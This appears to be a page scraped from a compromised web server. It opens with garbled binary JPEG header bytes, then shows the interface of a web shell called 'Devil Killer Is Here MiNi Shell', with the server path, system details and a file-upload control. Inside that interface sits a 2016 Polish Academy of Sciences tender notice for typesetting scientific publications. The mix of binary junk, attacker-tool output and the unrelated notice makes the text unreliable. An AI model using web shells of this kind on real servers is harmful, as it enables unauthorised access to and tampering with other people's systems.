JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160719/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160719/144323-N-2016.html

<p class="kh_header"><b>Warszawa: Świadczenie usług w zakresie przygotowania do druku (skład i łamanie) publikacji naukowych Polskiej Akademii Nauk</b><br>
<b>Numer ogłoszenia: 144323 - 2016; data zamieszczenia: 19.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polska  Akademia  Nauk , pl. Defilad 1, 00-901 Warszawa, woj. mazowieckie, tel. 22 182 62 32, faks 22 182 70 58.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Polska Akademia Nauk.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie przygotowania do druku (skład i łamanie) publikacji naukowych Polskiej Akademii Nauk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje sukcesywne świadczenie usług w zakresie przygotowania do druku (skład i łamanie) publikacji naukowych Polskiej Akademii Nauk w podziale na następujące zadania (części):
Część 1 -	publikacje z zakresu nauk humanistycznych i społecznych - 1111 arkuszy wydawniczych (załącznik nr 9);
Część 2 -	publikacje z zakresu nauk technicznych - 378 arkuszy wydawniczych (załącznik nr 10);
Zamawiający dopuszcza składanie ofert częściowych na jedną lub dwie wymienione powyżej części.
Przy wykonywaniu usługi w zakresie przygotowania do druku wymagane jest zachowanie layoutu (w tym czcionek) identycznych z już wydanymi zeszytami. Wzory są dostępne na stronie:
http://www.czasopisma.pan.pl/index.php?option=com_content&view=featured&Itemid=169. 
W przypadku publikacji wymienionych w załącznikach nr 9 i 10 konieczne jest odtworzenie layoutu. Jeśli zachodzi taka potrzeba, wymagane jest przeskładanie przysłanych w formie obrazu wzorów matematycznych, jedno- i dwustopniowych oraz chemicznych zgodnie z layoutem przy zachowaniu wymaganych czcionek.
Zleceniobiorca zobowiązany jest do wykonania do każdego Zlecenia okładki zgodnie ze wzorem przesłanym drogą elektroniczną lub w formie drukowanej. Okładka powinna zostać przesłana razem z materiałami do II korekty.
Zamawiający od dnia podpisania umowy do dnia 31.12.2017 r. będzie sukcesywnie przekazywał do wykonania (przygotowania do druku) kolejne publikacje naukowe PAN wymienione w załącznikach 9, 10 do SIWZ. W każdej części Zleceniodawca dopuszcza zamianę tytułów publikacji wymienionych w załącznikach 9, 10, odpowiadających swoim rodzajem przedmiotowi zamówienia w ramach przewidzianych Umową arkuszy.
Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 1 do SIWZ.
Zamawiający dopuszcza w uzasadnionych przypadkach możliwość zmiany umowy w sprawie udzielenia zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. W szczególności Zamawiający dopuszcza przesunięcie terminu wykonania umowy w związku z zaistnieniem okoliczności, których nie można było przewidzieć w chwili ustalania tego terminu. Dopuszczalne jest także odstąpienie od realizacji zamówienia przez Zamawiającego w całości, jeżeli zamówienie przestało leżeć w interesie Zamawiającego wskutek okoliczności niemożliwych wcześniej do przewidzenia. Odstąpienie musi zostać zgłoszone w terminie 30 dni od wystąpienia okoliczności uzasadniających odstąpienie. 
Zamawiający zastrzega sobie możliwość rezygnacji ze Zlecenia przygotowania do druku do 35% łącznej wielkości zamówienia w każdej z części, określonej poprzez przewidywaną w SIWZ liczbę arkuszy wydawniczych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.82.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia, o których mowa w Rozdziale VII Specyfikacji Istotnych Warunków Zamówienia (SIWZ), na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku Wykonawca zobowiązany jest wykazać, iż należycie wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a. Dla części 1 Zamówienia: usługi (co najmniej 1 usługę) odpowiadające swoim rodzajem przedmiotowi zamówienia. Przez usługi odpowiadające swoim rodzajem przedmiotowi zamówienia należy rozumieć usługę lub kilka usług obejmujące: przygotowanie do druku (skład i łamanie) czasopism lub książek naukowych o charakterze humanistycznym i społecznym zawierających ilustracje, tabele, wzory oraz różne rodzaje znaków i alfabetów, o łącznej wartości nie mniejszej niż 60 000,00 zł brutto, z zastrzeżeniem, że wskazać należy maksymalnie 5 usług, których łączna wartość daje wymaganą kwotę; 
b. Dla części 2 Zamówienia: usługi (co najmniej 1 usługę) odpowiadające swoim rodzajem przedmiotowi zamówienia. Przez usługi odpowiadające swoim rodzajem przedmiotowi zamówienia należy rozumieć usługę lub kilka usług obejmujące: przygotowania do druku (skład i łamanie) czasopism lub książek naukowych o charakterze technicznym zawierających ilustracje, tabele, wielostopniowe wzory matematyczne i chemiczne oraz różne rodzaje znaków i alfabetów, o łącznej wartości nie mniejszej niż 50 000,00 zł brutto, z zastrzeżeniem, że wskazać należy maksymalnie 5 usług, których łączna wartość daje wymaganą kwotę.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia, o których mowa w Rozdziale VII SIWZ, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia, o których mowa w Rozdziale VII SIWZ, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku Wykonawca zobowiązany jest wykazać, iż dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - w celu potwierdzenia spełnienia warunku Wykonawca musi wykazać, że:
a. Dla części 1 Zamówienia: dysponuje minimum trzema osobami, operatorami DTP, które posiadają co najmniej trzyletnie doświadczenie:
 -	 w zakresie przygotowania do druku czasopism naukowych o charakterze humanistycznym, pracujące w programie Adobe InDesing lub QXP.
Osoby te będą realizować zamówienia Zamawiającego i będą upoważnione do dokonywania ustaleń w zakresie technicznych aspektów realizacji Zamówienia. 
b. Dla części 2 Zamówienia: dysponuje minimum trzema osobami, operatorami DTP, które posiadają co najmniej trzyletnie doświadczenie
-  w zakresie przygotowania do druku czasopism naukowych o charakterze technicznym, w których występują wzory matematyczne i chemiczne wielostopniowe, pracujące w programie Adobe InDesing lub QXP oraz Tex i LaTex. 
Osoby te będą realizować zamówienia Zamawiającego i będą upoważnione do dokonywania ustaleń technicznych aspektów realizacji zamówienia. 
Jeśli Wykonawca składa ofertę na część 1 i 2 Zamówienia, w celu wykazania, że dysponuje osobami zdolnymi do wykonania zamówienia Wykonawca zobowiązany jest do każdej części zamówienia podać inne osoby, tj. dysponować minimum sześcioma osobami, po trzy osoby do realizacji każdej części Zamówienia.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia, o których mowa w Rozdziale VII SIWZ, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia, o których mowa w Rozdziale VII SIWZ, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - Jakość - 60</li>
<li>3 - Zatrudnienie na podstawie umowy o pracę - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza w uzasadnionych przypadkach możliwość zmiany umowy w sprawie udzielenia zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. W szczególności Zamawiający dopuszcza przesunięcie terminu wykonania umowy w związku z zaistnieniem okoliczności, których nie można było przewidzieć w chwili ustalania tego terminu. Dopuszczalne jest także odstąpienie od realizacji zamówienia przez Zamawiającego w całości, jeżeli zamówienie przestało leżeć w interesie Zamawiającego wskutek okoliczności niemożliwych wcześniej do przewidzenia. Odstąpienie musi zostać zgłoszone w terminie 30 dni od wystąpienia okoliczności uzasadniających odstąpienie. Zamawiający dopuszcza zmianę postanowień zawartej Umowy w szczególności w zakresie: 
a)	zmiany osób odpowiedzialnych za współpracę ze strony Wykonawcy pod warunkiem posiadania przez nowe osoby kompetencji określonych w SIWZ
w Rozdziale VI w ust. 1 pkt 3 tj.: 
-	osoba, która posiada co najmniej trzyletnie doświadczenie w zakresie przygotowania do druku czasopism i książek  naukowych (dla części 1 Zamówienia);
-	osoba, która posiada co najmniej trzyletnie doświadczenie w zakresie przygotowania do druku czasopism i książek naukowych o charakterze technicznym, w których występują wzory matematyczne i chemiczne wielostopniowe (dla części 2 Zamówienia); 
pod warunkiem przedstawienia Zamawiającemu przez Wykonawcę informacji o proponowanej zmianie wraz z wyjaśnieniem przyczyn proponowanej zmiany i uzyskaniem pisemnej zgody Zamawiającego lub na skutek żądania Zamawiającego, jeżeli uzna, że osoby odpowiedzialne za współpracę z Zamawiającym nie wykonują obowiązków wynikających z umowy;
b)	zmian (wskazania innych bądź nowych) tytułów publikacji naukowych, PAN przeznaczonych do wykonania przez Wykonawcę w stosunku do wyszczególnionych w załączniku nr 3 do Umowy, pod warunkiem ich analogicznej tematyki i poziomu trudności w stosunku do tytułów wyszczególnionych w załączniku nr 3 do Umowy.   
c)	wynikającym ze zmiany przepisów prawa, które będą miały wpływ na realizację Umowy;
d)     strony zobowiązują się dokonać zmiany wysokości wynagrodzenia należnego Wykonawcy, w formie pisemnego aneksu, każdorazowo w przypadku wystąpienia jednej z następujących okoliczności:
1)      zmiany stawki podatku od towarów i usług,
2)      zmiany wysokości minimalnego wynagrodzenia ustalonego na podstawie przepisów o minimalnym wynagrodzeniu za pracę,
3)      zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
- na zasadach i w sposób określony we wzorze Umowy, jeżeli zmiany te będą miały wpływ na koszty wykonania Umowy przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pan.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2016 godzina 10:00, miejsce: Siedziba Zamawiającego w Warszawie, Plac Defilad 1, 
00-901 Warszawa, PKiN, Zespół Zamówień Publicznych (piętro 25, pok. nr 2516)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca zobowiązany jest dołączyć do swojej oferty próbkę. Do każdej z części wymagana jest oddzielna próbka. Próbka stanowić będzie treść oferty, a jej niezałączenie skutkować będzie odrzuceniem oferty na podstawie art. 89 ust. 1 pkt 2 ustawy. Wymaga się, aby próbka zawierała elementy pozwalające na dokonanie jej oceny, zgodnie z kryterium oceny ofert - jakość, opisanym w Rozdziale XIV ust. 2 pkt 2) SIWZ. Próbkę uzna się za zgodną z treścią SIWZ, jeżeli będzie można w niej pozytywnie ocenić wszystkie punkty z dziesięciopunktowego kryterium oceny jakości. Pozytywna ocena oznacza przyznanie 14 punktów przez każdego z trzech członków komisji. Z uwagi na charakter próbki jako treści oferty, realizacja przyszłego zamówienia odbywać musi się w jakości zgodnej z przedstawioną próbką, w szczególności w zakresie elementów, które podlegają ocenie w ramach kryteriów oceny ofert, wskazanych w Rozdziale XIV ust. 2 pkt 2 SIWZ. 
Zamawiający wymaga, aby przedłożona próbka składała się z trzech tytułów i była wydaną książką/ książkami lub czasopismem/ czasopismami zawierającymi:  
-	dla części 1 - rysunki, zdjęcia, tabele, proste wzory matematyczne, znaki i litery różnych alfabetów. Przewidziane dla części 1 książki lub czasopisma wchodzące w skład próbki mają być naukowymi publikacjami o tematyce humanistycznej i społecznej, posiadającymi numer ISSN lub ISBN. 
-	dla części 2 - rysunki, zdjęcia, tabele oraz wielowierszowe wzory matematyczne, zawierające równania różniczkowe, całkowe, macierze, wzory zawierające zmienne zapisywane alfabetem łacińskim, wzory chemiczne oraz litery i znaki rożnych alfabetów. Przewidziane dla części 2 książki lub czasopisma wchodzące w skład próbki mają być naukowymi publikacjami o tematyce technicznej, posiadającymi numer ISSN lub ISBN.
Wchodzące w skład próbki publikacje mają być książką lub czasopismem wydanym w ciągu ostatnich trzech lat w wersji papierowej w języku polskim lub w jednym z języków kongresowych. Przedłożona próbka powinna być zakwalifikowana przez Wykonawcę do danego zadania częściowego, oznaczenie powinno znajdować się na próbce i wskazywać, której części zamówienia dotyczy. W przypadku gdy Wykonawca załączy do oferty większą liczbę tytułów niż wymagana, zobowiązany jest w Formularzu oferty wskazać tytuły, które mają zostać poddane ocenie w kryterium jakość. Niewskazanie tytułów w ww. przypadku skutkować będzie uznaniem próbki za niezgodną z treścią SIWZ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiot zamówienia obejmuje sukcesywne świadczenie usług w zakresie przygotowania do druku (skład i łamanie) publikacji naukowych Polskiej Akademii Nauk. Część I - Publikacje z zakresu nauk humanistycznych i społecznych - 1111 arkuszy wydawniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług w zakresie przygotowania do druku czasopism z zakresu nauk humanistycznych i społecznych.
Temat: Wykonanie składu komputerowego i łamania tekstu oraz komputerowe opracowanie okładki, rysunków, zdjęć, tabel, wzorów matematycznych do pozycji wydawniczych z zakresu nauk humanistycznych i społecznych. Wykaz tytułów przewidzianych do realizacji został zestawiony w Załączniku nr 9 do SIWZ.
Opis: Zamawiający zleci skład komputerowy i łamanie tekstu oraz komputerowe opracowanie okładki, rysunków, zdjęć, tabel, wzorów matematycznych do pozycji wydawniczych z zakresu nauk humanistycznych i społecznych, o objętości ogółem 1111 arkuszy wydawniczych z możliwością zmniejszenia tej liczby maksymalnie o 35%.
Sposób realizacji: Zleceniodawca wymaga, aby Zleceniobiorca wykonał wszystkie Zlecenia z najwyższą starannością oraz na każdym etapie prac dokonał wewnętrznej korekty, tj. sprawdził zgodność wykonanego Zlecenia z materiałem autorskim i wprowadzonym opracowaniem edytorskim.
Termin realizacji zleceń do pierwszej korekty do 15 dni roboczych od przekazania plików. Zamawiający oczekuje przekazania materiału w formie wydruku i zapisu w postaci plików pdf z podziałem na artykuły.  
Termin naniesienia poprawek z pierwszej korekty do 7 dni roboczych. Poprawki zostaną dostarczone w tradycyjnej formie papierowej z użyciem znaków korektorskich, (dopuszcza się formę elektroniczną poprawek: w pliku pdf lub w formie nadesłanych uwag).
Termin naniesienia poprawek z drugiej korekty do 5 dni. Poprawki zostaną dostarczone w tradycyjnej formie papierowej z użyciem znaków korektorskich, (dopuszcza się formę elektroniczną poprawek: w pliku pdf lub w formie nadesłanych uwag).
Termin naniesienia poprawek z rewizji do 3 dni roboczych. Poprawki zostaną dostarczone w formie elektronicznej.
Forma przekazania plików do druku - pliki kompozytowe, paleta barw CMYK. Dodatkowo zatwierdzony plik do druku z podziałem na poszczególne artykuły. Termin wykonania 1 dzień roboczy.
Czas realizacji, o którym mowa w powyższych punktach, liczony jest od momentu poinformowania Wykonawcy przez Zamawiającego, że materiały będące podstawą realizacji danych czynności są gotowe do odbioru, do momentu dostarczenia przez Wykonawcę materiałów (wraz z podstawą korektową) do siedziby Zamawiającego lub miejsca określonego przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Jakość - 60</li>
<li>3. Zatrudnienie na podstawie umowy o pracę - 10</li>
</ul>
</li>
</ul><br>
